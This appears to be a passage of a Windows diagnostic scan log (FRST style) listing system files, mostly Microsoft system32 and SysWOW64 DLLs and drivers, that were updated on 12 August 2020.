2020-08-12 19:45 - 2020-08-12 19:45 - 000971776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsregcmd.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000941568 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000893952 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000843776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000738064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000724480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000709120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000705536 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000701440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Mirage.Internal.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000692224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000669184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000666280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsecedit.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\WalletService.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000408576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000359496 _____ (Microsoft Corporation) C:\WINDOWS\system32\MP4SDECD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000353792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000343408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MP4SDECD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000338944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapibase.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000330240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\upnphost.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000309248 _____ (Microsoft Corporation) C:\WINDOWS\system32\tapisrv.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tapisrv.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\IndexedDbLegacy.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IndexedDbLegacy.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrahc.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\net1.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdSSDP.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000065536 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iemigplugin.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\udhisapi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\upnpcont.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\msisip.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msisip.dll
2020-08-12 19:44 - 2020-08-12 19:45 - 022642688 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 025903104 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 017792512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 014820352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 009932088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 007915864 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007850784 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007604584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007583272 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10warp.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007297536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007270728 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 006526448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 006436864 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 006074552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005946368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005849872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005767224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005283776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005111296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005003824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 004625184 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 004565248 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 004227116 _____ C:\WINDOWS\system32\DefaultHrtfs.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 004005376 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003974376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 003806208 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003743056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003727872 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 003712000 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003581240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 003368616 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003141632 _____ (Microsoft Corporation) C:\WINDOWS\system32\directml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003084800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002986808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002808832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002799104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002766952 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2020-08-12 19:44 - 2020-08-12 19:44 - 002739200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\directml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002737664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002717696 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002698048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002583496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002576896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002552120 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002523136 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002471936 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002307584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002289152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002260312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002136064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcDesktopMonSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002096128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002085632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002022400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001942528 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001885184 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001756592 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2020-08-12 19:44 - 2020-08-12 19:44 - 001751040 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001743680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001740800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001697792 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001672544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001669344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001665024 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001660536 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001654312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001612800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001587712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001564160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001540096 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001512848 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001482568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 001458688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001420320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001406464 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001397576 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001393960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001366144 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2020-08-12 19:44 - 2020-08-12 19:44 - 001338368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001319936 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001282872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2020-08-12 19:44 - 2020-08-12 19:44 - 001274128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryPS.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001215488 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdclt.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001197056 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdengin2.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001182248 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001182208 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001149712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001127424 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcRefreshTask.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001123344 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001101312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001077048 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001072128 _____ (Microsoft Corporation) C:\WINDOWS\system32\BTAGService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001059328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001055232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001015296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001009664 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001008128 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000995840 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000963072 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000950784 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000937984 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000917800 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000914432 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000897648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MrmCoreR.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000894032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000888352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000875520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000875424 _____ (Microsoft Corporation) C:\WINDOWS\system32\pkeyhelper.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000874296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000867840 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000865280 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000843776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000841728 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Language.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000823744 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000822800 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000783480 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000782336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000775480 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000718336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000717312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.FileExplorer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000716312 _____ (Microsoft Corporation) C:\WINDOWS\system32\StateRepository.Core.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000702976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BTAGService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000690536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000677888 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000675040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000675024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000673088 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000672256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiaservc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000671040 _____ (Microsoft Corporation) C:\WINDOWS\system32\computecore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000668672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsecedit.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000661816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afd.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000649728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000629760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000593480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000579584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasdlg.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000572200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryPS.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000568128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000564488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StateRepository.Core.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\iprtrmgr.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000550400 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000548352 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000535040 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasgcw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000534016 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000522688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000521728 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000516096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtrmgr.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprdim.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.FileExplorer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000495104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasdlg.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000477496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2020-08-12 19:44 - 2020-08-12 19:44 - 000467968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000464384 _____ (Microsoft Corporation) C:\WINDOWS\system32\HrtfApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000463168 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000462848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000461112 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000457016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000456704 _____ (Microsoft Corporation) C:\WINDOWS\system32\upnphost.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000452096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TileDataRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000441144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000435200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000431104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasgcw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000405504 _____ (Microsoft Corporation) C:\WINDOWS\system32\DispBroker.Desktop.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000403456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprdim.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000379704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncbservice.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000369304 _____ (Microsoft Corporation) C:\WINDOWS\system32\BCP47Langs.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000355840 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000340992 _____ (Microsoft Corporation) C:\WINDOWS\system32\LanguageOverlayServer.dll
